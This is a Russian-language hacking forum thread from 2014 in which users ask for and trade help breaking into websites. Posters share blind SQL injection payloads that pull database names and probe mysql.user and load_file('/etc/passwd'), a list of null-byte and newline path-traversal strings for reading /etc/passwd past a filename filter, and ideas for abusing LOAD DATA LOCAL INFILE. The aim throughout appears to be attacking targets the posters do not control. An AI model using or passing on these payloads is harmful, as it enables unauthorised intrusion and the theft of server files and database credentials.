Старый 13.04.2014, 03:51   #3191
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Ребят,подсобите с блайнд скулей,плз

Скуля в LIKE.
Все БД выводятся так:
Код:
%' AND ORD(MID((SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>104 AND '%'='
В списке БД вижу mysql,скорее всего есть File_Priv
Но при попытке вывести что-либо(к примеру,Host из mysql.user) идут одни фолсы
Код:
%' AND ORD(MID((SELECT DISTINCT(Host) FROM mysql.user LIMIT 0,1),1,1))>1 AND '%'='
Подскажите,что я делаю не так,пожалуйста
QaRTiN вне форума   Ответить с цитированием
Старый 13.04.2014, 07:20   #3192
l1ght
 
Аватар для l1ght
 
Регистрация: 04.07.2010
Сообщений: 32
Репутация: 32
По умолчанию

Цитата:
Сообщение от QaRTiN Посмотреть сообщение
Ребят,подсобите с блайнд скулей,плз

Скуля в LIKE.
Все БД выводятся так:
Код:
%' AND ORD(MID((SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>104 AND '%'='
В списке БД вижу mysql,скорее всего есть File_Priv
Но при попытке вывести что-либо(к примеру,Host из mysql.user) идут одни фолсы
Код:
%' AND ORD(MID((SELECT DISTINCT(Host) FROM mysql.user LIMIT 0,1),1,1))>1 AND '%'='
Подскажите,что я делаю не так,пожалуйста
%'and(select(1)from(mysql.user)limit 1)='1 доступ к mysql
%'and(if(load_file('/etc/passwd')is null,1,2))='1 file_priv
l1ght вне форума   Ответить с цитированием
Старый 15.04.2014, 14:40   #3193
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Есть запрос вида server.com/index.php?img=123.jpg для отображения картинок.
На сервере из имени файла вырезается символ / и все, что перед ним находится. Так же проверяется расширение файла.
PHP 4.4.9
Можно использовать нул байт, и прочитать любой файл в разрешенной директории. Можно так же прочитать список всех файлов в родительской директории index.php?img=..%00.jpg

Можно ли выйти за пределы разрешенной директории и прочитать файл?
zuzzz вне форума   Ответить с цитированием
Старый 15.04.2014, 15:19   #3194
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от zuzzz Посмотреть сообщение
Есть запрос вида server.com/index.php?img=123.jpg для отображения картинок.
На сервере из имени файла вырезается символ / и все, что перед ним находится. Так же проверяется расширение файла.
PHP 4.4.9
Можно использовать нул байт, и прочитать любой файл в разрешенной директории. Можно так же прочитать список всех файлов в родительской директории index.php?img=..%00.jpg

Можно ли выйти за пределы разрешенной директории и прочитать файл?
Попробуйте так:
PHP код:
index.php?img=%0A/../../../etc/passwd%00.jpg 
index
.php?img=../../../%0A/../../../etc/passwd%00.jpg 
index
.php?img=../../../.jpg%0A/../../../etc/passwd%00.jpg 
index
.php?img=../../../%00/../../../etc/passwd%00.jpg 
Если не получится, то, скорее всего, нельзя.
NameSpace вне форума   Ответить с цитированием
Старый 16.04.2014, 12:24   #3195
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Отправляю пост
mail=Remind%20password&Email=test@test.com
ничего
при
mail=Remind%20password&Email[]=test@test.com
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=1 ) or (=1 ) or (ID = '1' ) )
Ошибка появляется только при []
При запросах вообще никак не изменяется
Есть ли здесь скуля?
z0mbie вне форума   Ответить с цитированием
Старый 16.04.2014, 17:48   #3196
che
 
Аватар для che
 
Регистрация: 05.07.2010
Сообщений: 144
Репутация: 166
По умолчанию

z0mbie, скорее всего нет, многие пхп функции плохо переваривают массивы
che вне форума   Ответить с цитированием
Старый 16.04.2014, 21:13   #3197
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Вопрос магистрам sql:
Есть читалка sql из файла, выполняет все запросы построчно. Но если в начале запроса не присутствует insert into, она его насильно добавляет, точки с запятой вырезаются. Как бы так завернуть insert into или сделать local load подзапросом или вроде того?
madhatter вне форума   Ответить с цитированием
Старый 17.04.2014, 00:56   #3198
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

madhatter, Вы можете использовать весь синтаксис INSERT INTO. Что это за load load?

Попробуйте передать точку с запятой в начале, проверьте работоспособность различных способов размещения INSERT INTO - возможно есть некоторые допуски.
NameSpace вне форума   Ответить с цитированием
Старый 17.04.2014, 09:59   #3199
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
madhatter, Вы можете использовать весь синтаксис INSERT INTO. Что это за load load?

Попробуйте передать точку с запятой в начале, проверьте работоспособность различных способов размещения INSERT INTO - возможно есть некоторые допуски.
С точкой с запятой уже обошел - убирается только первая. Однако, используется стандартный php клиент мускула, который не позволяет в одной строке указывать несколько выражений, поэтому точка с запятой тут не поможет. Полагаю, в скрипте дамп базы разделяется по ";\ninsert into", потом в начало каждой строки(уже без insert into, т.к. он был разделителем) дописывается это самое insert into. И единственный разумный вектор здесь - load data local infile, там волшебная багофича, позволяющая читать файлы с file_priv=n. Исходя из мана обеих, завернуть load data подзапросом insert как-то не выйдет. Возможно, получится как-то по логике завернуть insert into и выполнить load data. Что-то вроде:
Код:
insert into table(val) values (1) and load data ...
madhatter вне форума   Ответить с цитированием
Старый 17.04.2014, 13:45   #3200
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

madhatter, С тем же успехом, что завернуть SELECT и выполнить UPDATE.
NameSpace вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot